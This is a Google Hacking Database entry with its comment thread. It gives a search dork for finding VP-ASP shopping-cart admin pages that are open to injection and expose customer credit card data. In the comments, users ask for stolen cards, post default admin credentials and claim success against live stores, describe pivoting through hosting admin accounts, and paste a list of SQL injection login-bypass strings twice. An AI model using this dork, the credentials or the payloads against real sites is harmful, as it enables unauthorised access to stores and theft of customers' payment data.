GHDB
GHDB
|
Google Search: inurl:”shopadmin.asp” “Shop Administrators only”
kammo rates this entry 8 out of 10. Submitted: 2004-06-25 13:11:55 Added by: kammo Hits: 36435 Score: 8 VP-ASP (Virtual Programming – ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.It has been reported that the Shopping Cart Administration script is vulnerable to XSS and SQJ injection, resulting in exposure of confidential customer information like credit card details. More information on this attack is available at http://securitytracker.com/alerts/2002/May/1004384.html Comments: 2004-08-08 21:55:28 (FreQ): Nice 1 2004-09-01 17:12:15 (TheGenius): How can we acces in Kredit KArds. Can you show me some more info about this?? 2004-09-30 23:45:00 (splithorizon852): No CC man, go learn it. Noone is going to show you this stuff. 2004-10-01 18:03:01 (yndsport): how can i login into that site if you don’t tell me the trick for me to login 2004-10-27 16:36:25 (Anonymous): Can you give us pls some sql injection passwords for this pages ? 2004-11-07 22:29:17 (Thresh): http://www.techmystics.com/ShoppingCartDemo/shopadmin.asp working 2005-02-25 22:53:06 (immortalz4em): Please i will like if i can get more explanation on this shopping cart issue…..and i hope someone will explain to mii…..u can drop mii d explanation via email….immortalz4em@yahoo.com…thanx again 2005-02-28 03:04:33 (nfsutim): hey guys can we actually order stuff from the site and not have to pay for it?? http://www.vpasp.com/demo550/shopadmin1.asp 2005-03-26 01:04:11 (Twizik): HA HA HA HA HA HA HA *to the post above* the link http://www.vpasp.com/demo550/shopadmin1.asploko it over a few times just read the URL and tell me what you think 2005-03-26 14:47:23 (blackmass): ok this gives you the admin for the website but is no use if you dont have the users name and password, can anyone tell me how to get the users name and password? plz 2005-03-26 20:01:50 (alen1): is ther another way to hack shopaadmin? 2005-03-29 10:48:26 (star): This is really exciting to find all those information thorugh a simple search. 2005-04-14 01:54:55 (InFaDeLiTy): Great, But I Want To Know How How You Aquired The Password And Login Name. Just Point Me In The Right Direction To Learn How. Also, This Is Just To Find The Admin Login For The Site Right Nothing Else? 2005-06-24 02:13:56 (Anonymous): hey do we still need to use the exploit inorder to penetrate the shopping cart?..2005-07-09 16:44:07 (pinballz): try the default passwords 1. VPASP Product VP-ASP Shopping Cart Version Method HTTP User ID vpasp Password vpasp Level Admin Notes 2. VPASP Product VP-ASP Shopping Cart Version Method HTTP User ID admin Password admin Level Admin Notes i found a few that work pinB@llZ 2005-07-13 23:20:17 (Anonymous): omg. I can’t believe some people are so stupid. There is a big warning right at the top of the page on a default installation saying “You are using the default passwords. This makes your site open to hackers. Please change your userids and passwords as soon as possible.” I’ve found a few sites so far using the default admin:admin that are storing credit card info. Judging on the number of customers they aren’t freshly installed carts either so no “I haven’t got around to changing the password yet” excuses… 2005-11-01 06:43:28 (yemi2003): hi guyz,whats happening? A friend of mine told me that ur site is usefull in terms of revealing cc info, but to my surprise there is not even a word like that Please i will like to know if i can get any info on any valid credit card. 2005-12-25 03:05:51 (kasper5150): this doesnt work anymore because everyone has updated…now if u find a new one…cool. 2006-02-09 12:17:21 (userdan): Oh how i despite thee, of little brains… You people are desgusting… “LIEK Z0M6 I R NU N00B, NAW GIMME STEP BA STEP HAX HELPCRAFT, OR DIE, PLX!” Get a life, you morons….Either that, or learn how to hack, like the rest of us did. Losres. btw, i managed to hack a HACKERS email account through this.XD 2006-03-02 22:22:42 (hxun): THIS IS AWESOME~!!!!!!!! 1 of the hosting admin login check customer access email usually their email is same with the current email pass they entered. access email, grab others password get infos.. and if their web hosting for ASP is admin/admin whois the hoster check what website is hosted on their server, filter their ASP customers password same admin/admin u’re IN !!! some won’t work cause they manually changed the password.. 2006-04-19 14:23:57 (Noviceshacker): Hacker/novices like don`t suppose to ask such question about how to get the username name and password to login to the admin area.If you really wanna become a hacker don`t be lazy why don`t google for sql injection strings and you will find kool strings to login to the admin area:Below are some example:insect each sql string into the pass/login field.E.G username:’ or 0=0 — Pass:’ or 0=0 –.Any way i am a novicces in hacking,and i like hacking if any body wanna help me to fulfil my dream this is my yahoo Id badestsquard@yahoo.com Remember hack for fun and not for $$$$$$$$$ hacking for $$$$ is a sin.Thanks i love Hacking with passion.Thanks to all hackers here that are posting those exploit.It a pitty that i didn`t know this stuff on time.(Variations)admin’–’ or 0=0 –” or 0=0 –or 0=0 –’ or 0=0 #” or 0=0 #or 0=0 #’ or ‘x’='x” or “x”=”x’) or (‘x’='x’ or 1=1–” or 1=1–or 1=1–’ or a=a–” or “a”=”a’) or (‘a’='a”) or (“a”=”ahi” or “a”=”ahi” or 1=1 –hi’ or 1=1 –hi’ or ‘a’='ahi’) or (‘a’='ahi”) or (“a”=”aDon`t Hack for $$$$$$$$$$$$$$$$$ Hack for Fun and u will enyoy hacking 2006-04-20 04:21:03 (Noviceshacker): Hacker/novices like me don`t suppose to ask such question about how to get the username name and password to login to the admin area.If you really wanna become a hacker don`t be lazy why don`t google for sql injection strings and you will find kool strings to login to the admin area:Below are some example:insect each sql string into the user/pass field.E.G username:’ or 0=0 — Pass:’ or 0=0 –.Any way i am a novicces in hacking,and i like hacking if any body wanna help me to fulfil my dream this is my yahoo Id badestsquard@yahoo.com Remember hack for fun and not for $$$$$$$$$ hacking for $$$$ is a sin.Thanks i love Hacking with passion.Thanks to all hackers here that are posting those exploit.It a pitty that i didn`t know this stuff on time. (Variations) admin’– ‘ or 0=0 – ” or 0=0 – or 0=0 – ‘ or 0=0 # ” or 0=0 # or 0=0 # ‘ or ‘x’='x ” or “x”=”x ‘) or (‘x’='x ‘ or 1=1– ” or 1=1– or 1=1– ‘ or a=a– ” or “a”=”a ‘) or (‘a’='a “) or (“a”=”a hi” or “a”=”a hi” or 1=1 – hi’ or 1=1 – hi’ or ‘a’='a hi’) or (‘a’='a hi”) or (“a”=”a Don`t Hack for $$$$$$$$$$$$$$$$$ Hack for Fun and u will enyoy hacking |
Does GHDB still updates for now?
The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.
Hi Johnny,been a while since I’ve came last. Aren’t you gonna update this website anymore???
The GHDB is not updated and lives with the exploitdb: http://http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!
Is any offline view-able resources is available of this product ?